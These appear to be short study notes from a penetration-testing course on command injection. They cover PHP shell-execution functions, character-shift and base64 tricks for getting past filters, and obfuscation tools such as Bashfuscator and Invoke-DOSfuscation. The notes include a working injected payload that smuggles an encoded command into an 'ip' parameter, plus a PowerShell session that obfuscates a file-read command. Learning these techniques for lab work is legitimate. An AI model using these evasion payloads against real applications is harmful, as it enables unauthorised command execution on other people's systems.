Command Injection

PHP Command Injection

a web application written in PHP may use the exec, system, shell_exec, passthru, or popen functions to execute commands

Injection Operators

Bit Shift any ASCII character

echo $(tr '!-}' '"-~'<<<[)

Bypass blacklisted character cheat sheet

https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions

Base64 Evasion

ip=127.0.0.1%0abash<<<$(base64%09-d<<<d2hvYW1p)

Bashfuscator

<https://github.com/Bashfuscator/Bashfuscator>

Dosfuscation

<https://github.com/danielbohannon/Invoke-DOSfuscation>
PS C:\\htb> git clone <https://github.com/danielbohannon/Invoke-DOSfuscation.git>
PS C:\\htb> cd Invoke-DOSfuscation
PS C:\\htb> Import-Module .\\Invoke-DOSfuscation.psd1
PS C:\\htb> Invoke-DOSfuscation
Invoke-DOSfuscation> help
Invoke-DOSfuscation> SET COMMAND type C:\\Users\\htb-student\\Desktop\\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\\Encoding> 1